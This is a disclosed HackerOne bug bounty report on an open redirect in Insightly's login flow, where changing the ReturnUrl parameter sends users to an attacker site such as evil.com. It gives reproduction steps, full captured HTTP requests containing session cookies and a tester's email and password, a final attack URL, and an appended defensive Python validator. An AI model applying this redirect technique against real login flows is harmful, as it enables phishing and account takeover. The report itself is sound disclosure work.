Insightly | Report #1544236 - returnUrl= parameter allows an attacker to redirect users to a phishing site and steal credentials | HackerOne
Timeline
basant0x01 submitted a report to Insightly.
April 19, 2022, 6:51 AM UTC
Report content
Hello team,
While testing the application https://crm.na1.insightly.com I found an interesting parameter through which a user can be redirected to another domain, and the victim's account could possibly be hijacked. The issue sits in the login authentication flow, so there is a risk of easily taking over the victim's account.
Vulnerable URL
https://crm.na1.insightly.com/User/FrontDoorLogin/?token=fAPkY7H7fgz6AugiWS1HqmgQro69VkrFfjz%2fWKUbuJKtOIbCH0Npi1DvVp0kXUo7JYrQ2Kep6VUOybmgBo6q9byEMy3Itsa35Ra60cK2eUFK6i78lKdX4%2fQN4Ln3UPEzfpMTvk8ocH6Ikix0zKolaN%2f0kaMWB3Ia4GCVOvTPhfZUGkgOY%2fHMC9ZCrdjXMNP%2fjoOqZ%2foqBrFRu4tCE%2fmX%2fJW5o3J18Hx9MOuOVCNgs1mD8zKjIz1uSW%2boBmu%2bMfXT&returnUrl=http%3a%2f%2f192.168.1.77%3a8000%2f
This URL is valid only once; a new URL has to be generated for each new attack or redirect.
Steps to reproduce
- Go to the site [crm.na1.insightly.com] and log in with your credentials.
- Intercept the request; you will get the following request:
POST /User/AuthenticateForms HTTP/1.1
Host: login.insightly.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 200
Origin: https://login.insightly.com
Connection: close
Referer: https://login.insightly.com/User/Login?ReturnUrl=%2f
Cookie: _sp_ses.7ea0=*; _sp_id.7ea0=f284c58a-fddc-4d25-be6f-72f320bc4ce3.1650349456.1.1650350244.1650349456.792d3660-5b12-4146-b8d5-114c86c5fded; _ga=GA1.2.502174674.1650349457; _gid=GA1.2.8955303.1650349457; _clck=orzge0|1|f0r|0; _clsk=hdl3b6|1650350248802|3|1|a.clarity.ms/collect; _gcl_au=1.1.368515797.1650349583; optimizelyEndUserId=oeu1650349584844r0.9398955011674065; AWSALB=Y3Fjm3LQsxNKT84McWot52MHU2C/HwfKbq+s74yUTTH2TEx2nF+3XmMjln92tMk76u648lSWWcAxdgiExZPj1hoJjECf7KtNZJETE9f4L/MeRALwV+7n8nE7sp8i; AWSALBCORS=Y3Fjm3LQsxNKT84McWot52MHU2C/HwfKbq+s74yUTTH2TEx2nF+3XmMjln92tMk76u648lSWWcAxdgiExZPj1hoJjECf7KtNZJETE9f4L/MeRALwV+7n8nE7sp8i; __RequestVerificationToken=QCRlZvTgq1rk1IUSbo8mRy-mB7iuijVFW86khR6ZnGbFMug6h6VoK9i31B-I7H-u9D96HtrUMXH6RmwEmgFNbIz50Yg1; X-FrontDoor-ReturnUrl=2edc8651-06eb-403a-96c8-272da3cd9efa; X-FrontDoor-AppId=3a16582b-b1f0-4306-a2ba-397c731514a4; _uetsid=565beaf0bfa911ecb94aef8d37202906; _uetvid=565bd680bfa911ecad8d2b88a420a93c
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
__RequestVerificationToken=4BVQV2MAdvcy2OyK6O0n3y42YRSJDDLcxesTFOeBBnwMLe1tiW_wCpMUoVZOop4wu1SxC95l_rcYoEGGWnzriUmmZJE1&email=ilovebugbounty%40gmail.com&password=AMRIT007qwerty%23&ReturnUrl=%2F&AppId=
- Change the parameter ReturnUrl=%2F to ReturnUrl=https://evil.com.
- Send the request.
- You will receive the following GET URL:
GET /User/FrontDoorLogin/?token=YrkOz7vdHHA9AH7B%2fY5jUdIP1%2bchPdePfn0Zm7uCtVQui0tHHMW24B14WwsYP5%2bKpa3Xz7%2f5r5muQa3EB%2bQEwtPlJ8XbvozoLZFfhD75Sm3tKLhdgfWWHYq8abV2%2bpOtifD1I5N2uomDBXvMQ8tjFREb39XDuUcrObQMUsqboMZY9dojVqORmIYwb4VPyoSBaYOF4%2bYOX3GTYj8t1ArOA0xeH4oorz6flU6FLrfTLdtG6u%2fC7vZ9CfvsfH3F%2bBye&returnUrl=https://evil.com HTTP/1.1
Host: crm.na1.insightly.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://login.insightly.com/
Connection: close
Cookie: _sp_ses.7ea0=*; _sp_id.7ea0=f284c58a-fddc-4d25-be6f-72f320bc4ce3.1650349456.1.1650350244.1650349456.792d3660-5b12-4146-b8d5-114c86c5fded; _ga=GA1.2.502174674.1650349457; _gid=GA1.2.8955303.1650349457; _clck=orzge0|1|f0r|0; _clsk=hdl3b6|1650350248802|3|1|a.clarity.ms/collect; _gcl_au=1.1.368515797.1650349583; optimizelyEndUserId=oeu1650349584844r0.9398955011674065; snaptid=sac1prdc01ap32; __CustomRequestVerificationToken=ba8vT_9GKG9c0C5ouvyDnb6dib23sbOGJDcGfABOsc7nWF0b4EDAJ6rndoYccjq97kyMQUgXaVNze4B9qLr_L6JKVxc1; __CustomRequestVerificationToken_FormFieldToken=yMCVyZ-Lf9cVa5jCl7aMUt0X7F_OIv31VPzzgEenFFItTXoJKRblcOHfQcrZ5J6cGRcyi444j1U6iVu9zMsRh6wYS-2X5UvW3wbEtQTrhgBrMGs1WkyBLkc6JFdwb2yVRXEJ4A2; __CustomRequestVerificationToken_RequestHeader=ba8vT_9GKG9c0C5ouvyDnb6dib23sbOGJDcGfABOsc7nWF0b4EDAJ6rndoYccjq97kyMQUgXaVNze4B9qLr_L6JKVxc1:yMCVyZ-Lf9cVa5jCl7aMUt0X7F_OIv31VPzzgEenFFItTXoJKRblcOHfQcrZ5J6cGRcyi444j1U6iVu9zMsRh6wYS-2X5UvW3wbEtQTrhgBrMGs1WkyBLkc6JFdwb2yVRXEJ4A2; __RequestVerificationToken=wPFGU1uIataG6NwAZqD3eSkHbpqcI_uL95kRCj3JVRzNwWDPjKEzT6Y7gBcVjRxo18lPLGKF0qezBquaDeAuHBPbIfA1; _sp_ses.4737=*; _sp_id.4737=db22efce-2016-4e0a-b209-3fa6d6e03a33.1650349600.1.1650349859.1650349600.9e684406-e88a-47b0-aea8-43f727a538ce; __utma=257427929.502174674.1650349457.1650349601.1650349601.1; __utmb=257427929.4.10.1650349601; __utmc=257427929; __utmz=257427929.1650349601.1.1.utmcsr=accounts.insightly.com|utmccn=(referral)|utmcmd=referral|utmcct=/; _ga=GA1.4.502174674.1650349457; _gid=GA1.4.8955303.1650349457; error=; _uetsid=565beaf0bfa911ecb94aef8d37202906; _uetvid=565bd680bfa911ecad8d2b88a420a93c
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-site
Sec-Fetch-User: ?1
- Copy this URL and the domain. The final attack URL is:
https://crm.na1.insightly.com/User/FrontDoorLogin/?token=fAPkY7H7fgz6AugiWS1HqmgQro69VkrFfjz/WKUbuJKtOIbCH0Npi1DvVp0kXUo7JYrQ2Kep6VUOybmgBo6q9byEMy3Itsa35Ra60cK2eUFK6i78lKdX4/QN4Ln3UPEzfpMTvk8ocH6Ikix0zKolaN/0kaMWB3Ia4GCVOvTPhfZUGkgOY/HMC9ZCrdjXMNP/joOqZ/oqBrFRu4tCE/mX/JW5o3J18Hx9MOuOVCNgs1mD8zKjIz1uSW+oBmu+MfXT&returnUrl=https://evil.com
Impact
An attacker can easily redirect the URL to a phishing site and hijack the victim's account through the login endpoint.
Attachments
2 attachments:
F1698318: redirect.png
F1698323: evil.png
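As an added defender-side example, not part of the report or of Insightly's code: a Python validator for a ReturnUrl/returnUrl parameter that only accepts same-site destinations, shown next to the naive "starts with a slash" check that still lets protocol-relative URLs through. The allow-listed hosts and the default landing path are assumptions; call it on the already URL-decoded value.

```python
from urllib.parse import urlsplit

# Assumed allow-list of hosts a login flow may legitimately send users to.
ALLOWED_HOSTS = {"crm.na1.insightly.com", "login.insightly.com"}
DEFAULT_RETURN = "/"  # assumed safe landing page when the parameter is rejected


def naive_is_local(return_url: str) -> bool:
    """The check many apps start with: 'it begins with /, so it is local'.
    It accepts '//evil.com', which browsers treat as a protocol-relative
    URL, so it is NOT a sufficient open-redirect defence."""
    return return_url.startswith("/")


def safe_return_url(return_url, allowed_hosts=ALLOWED_HOSTS, default=DEFAULT_RETURN):
    """Return a destination that is safe to redirect to, or `default`."""
    if not return_url:
        return default
    # Browsers drop tab/CR/LF inside URLs and treat backslash as slash, so
    # normalise the same way before deciding; otherwise "/\evil.com" or
    # "/\t/evil.com" slip past a path-only check.
    candidate = "".join(ch for ch in return_url if ch not in "\t\r\n").strip()
    candidate = candidate.replace("\\", "/")
    try:
        parts = urlsplit(candidate)
    except ValueError:  # e.g. malformed IPv6 literal in the host part
        return default
    if parts.scheme or parts.netloc:
        # Absolute or protocol-relative URL: allow only https to a known host.
        # `hostname` is parsed after any userinfo, so "host@evil.com" is caught.
        if parts.scheme != "https" or parts.hostname not in allowed_hosts:
            return default
        return candidate
    # Relative reference: must be a single-slash path on this origin.
    if not candidate.startswith("/") or candidate.startswith("//"):
        return default
    return candidate
```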
Follow-up activity
- basant0x01 asked about progress several times and provided a POC video.
- The HackerOne triage team confirmed review on July 6, 2022, and adjusted the severity from High to Low; it was later changed to Medium on January 24, 2023.
- The Insightly team confirmed the vulnerability and rewarded basant0x01.
- The vulnerability was confirmed fixed on August 3, 2023, and the report was disclosed on June 4, 2025.
Report details
- Submitted: April 19, 2022, 6:51 AM UTC
- Reported by: basant0x01
- Reported to: Insightly
- Report ID: #1544236
- State: Resolved
- Severity: Medium (4 ~ 6.9)
- Disclosed: June 4, 2025, 1:12 PM UTC
- Weakness: Improper Authentication - Generic
- CVE ID: None
- Bounty: Hidden
- Account details: None